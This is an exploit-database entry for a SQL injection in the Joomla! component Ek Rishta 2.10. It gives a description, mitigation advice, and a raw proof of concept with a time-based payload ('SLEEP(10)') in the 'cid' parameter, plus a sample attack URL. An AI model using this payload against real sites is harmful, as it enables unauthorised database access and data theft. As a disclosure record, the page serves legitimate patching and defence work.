header-logo
Suggest Exploit
vendor:
Ek Rishta
by:
41!kh4224rDz
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Ek Rishta
Affected Version From: 2.10
Affected Version To: 2.10
Patch Exists: NO
Related CWE: N/A
CPE: a:joomlaextensions:ek_rishta:2.10
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64
2018

Joomla! Component Ek Rishta 2.10 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component Ek Rishta 2.10, which allows an attacker to inject malicious SQL queries into the application. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The vulnerability is due to insufficient sanitization of user-supplied input in the 'cid' parameter of the 'user_detail' view. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL code to the vulnerable application. This can result in the execution of arbitrary SQL commands in the back-end database, allowing an attacker to gain access to sensitive data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# # # #
# Exploit Title: Joomla! Component Ek Rishta 2.10 - SQL Injection 
# Dork: N/A
# Date: 08.06.2018
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Software Link: https://extensions.joomla.org/extension/ek-rishta/
# Version: 2.10
# Tested on: WiN7_x64/
# video : https://youtu.be/UWGFVUU9AU0
# # # #
# Exploit Author: 41!kh4224rDz
# # # #
# ------------------------------SQL
Injection----------------------------------------
# POC:
# Parameter : user_detail&cid
# Payload : 1%' AND SLEEP(10)%23
#
# 1)
#
http://localhost/[PATH]/index.php?option=com_ekrishta&view=user_detail&cid=941%%27%20AND%20SLEEP(10)%23
#
#
# # # #

Navigation

Suggest Exploit

Services By CQR